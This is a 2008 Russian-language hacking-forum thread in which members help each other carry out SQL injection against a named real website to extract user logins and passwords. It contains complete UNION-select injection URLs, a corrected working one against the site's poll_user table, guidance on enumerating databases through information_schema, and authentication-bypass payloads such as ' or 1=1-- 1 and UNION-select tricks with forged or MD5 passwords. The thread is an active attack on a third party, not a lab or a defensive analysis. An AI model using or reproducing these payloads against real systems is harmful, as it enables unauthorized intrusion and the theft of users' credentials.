HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.11.2008, 23:57
Sindicat
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме:
42624

Репутация: 10
По умолчанию

Помогите все знаю, но логин и пасс не могу выташить
_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat_ws(0x3a3a,column_nam e),5,6,7+from+information_schema.columns+where+tab le_name=char(112,111,108,108,95,117,115,101,114)--


_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,

0x3a,userpass),5,6,7+from+poll_user--
 
Ответить с цитированием

  #2  
Старый 19.11.2008, 23:58
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD
 
Ответить с цитированием

  #3  
Старый 20.11.2008, 02:26
_nic
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851

Репутация: 107


По умолчанию

Цитата:
Сообщение от ThreeD  
_nic
Вопрос,как я понимаю, риторический? КАК вообще можно сделать что либо в сети безпалевно?
Они следят за нами. Всегда! xD
Ну а как хоть как то чекнуть днс на эту дырку http://www.securitylab.ru/vulnerability/355730.php ???
 
Ответить с цитированием

  #4  
Старый 20.11.2008, 00:03
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Sindicat
Я точно не смотрел, но кажется что надо пробить тебе на database(), а потом просто использовать конкатенацию +from+database_name.table_name
И зачем чарить в конце? Захекси =)
Честно-лень смотреть. Мог бы и не писать,скажете вы. Но не писать вообще лень =)
Там же вообще выводится что либо? Принтабельные есть? Т.к. ошибка скачет постоянно...
Без обид, я немного выпил "за сегодняшний удачный день!" =)
 
Ответить с цитированием

  #5  
Старый 20.11.2008, 00:06
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

ThreeD абсолютно прав, мне было не лень )
http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,%200x3a,use rpass),5,6,7+from+d8242sd5804.poll_user--
 
Ответить с цитированием

  #6  
Старый 20.11.2008, 00:24
Sindicat
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме:
42624

Репутация: 10
По умолчанию

спасибо !!! мне все - ровно не понятно я вывел database() , получил d8242sd15320 - а у тебя получился d8242sd5804 почему так ?
 
Ответить с цитированием

  #7  
Старый 20.11.2008, 00:28
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Sindicat
Видимо таблица poll_user относится к d8242sd5804 а не к d8242sd15320, иначе бы и конкатенацию использовать не пришлось. Не одна база просто, и ты сидишь не под нужной тебе. А используя d8242sd5804.poll_user, ты получаешь инфу из нужной тебе базы, которой является d8242sd5804, к которой и относится таблица poll_user.
В базе d8242sd15320 таблицы poll_user нет. Юзай concat_ws(0x3A3a,table_schema,table_name)+from+inf ormation_schema.tables , чтобы узнать к какой базе относится нужная тебе таблица.

Последний раз редактировалось ThreeD; 20.11.2008 в 00:31..
 
Ответить с цитированием

  #8  
Старый 20.11.2008, 00:39
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql
Цитата:
admin'
or 1=1--
но не получается. Как правильно ввести данные?
 
Ответить с цитированием

  #9  
Старый 20.11.2008, 00:47
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ershik  
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql

но не получается. Как правильно ввести данные?
Access не поддерживает комментарии вот это "--" не катит, прочитай наконец статью

https://forum.antichat.net/threadnav50550-1-10.html
 
Ответить с цитированием

  #10  
Старый 20.11.2008, 00:54
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Ershik  
На сайте под управлением mssql access есть уязвимость в авторизации.
пытаюсь скомбинировать как в mssql

но не получается. Как правильно ввести данные?
Это так теория, в твоём случае она не применима, но знать будет полезно (для других БД, к примеру мускул).

Это зависит только от запроса, т.е. найти вариант, который прокатывал бы в каждой админке с уязвимой авторизацией не реал.

1. "--" будет служить символом комментария только если после этого чуда идёт пробел, а в админках часто используется обрезание пробельных символов по краям, так что лучше юзать так: "-- 1".

2. Пробывать лучше это:

login' or 1=1-- 1
password' or 1=1-- 1

3. Часто бывает что без извращений с юнионом в админку по скуле в авторизации не попасть, но тут не видя сорца скрипта сделать что либо почти не реал.

Хотя в крации расскажу:

Если авторизации (т.е. проверка правильности введённой инфы) проходит только по результату запроса, то прокатывает посдановка вышеуказанной комбинации.
А бывает, что из запроса (по логину) достается соотвествующий пароль или хеш пароля, а уже затем он сравнивается с введённым тобою, что то вроде этого:

Код:
select password from admin where login = '$login';
В таких случаях нужно через объединение запросов впихивать левые данные:

Код:
логин = 1' and 1=2 union select 'pass'-- 1
И пароль соответственно = pass
Ну или есть хеширование:

Код:
логин = 1' and 1=2 union select md5('pass')-- 1
И пароль соответственно = pass
Но это так теория, на практике это будет геморно осуществить.

4. Ещё как вариант попробовать раскрутить инъекцию как слепую - тоже частенько удаётся сделать.

Последний раз редактировалось Grey; 20.11.2008 в 01:04..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.